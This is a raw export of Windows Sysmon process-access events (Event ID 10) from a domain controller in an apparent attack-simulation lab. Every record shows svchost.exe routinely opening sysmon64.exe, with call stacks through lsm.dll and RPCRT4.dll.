12:01:02.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.830{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 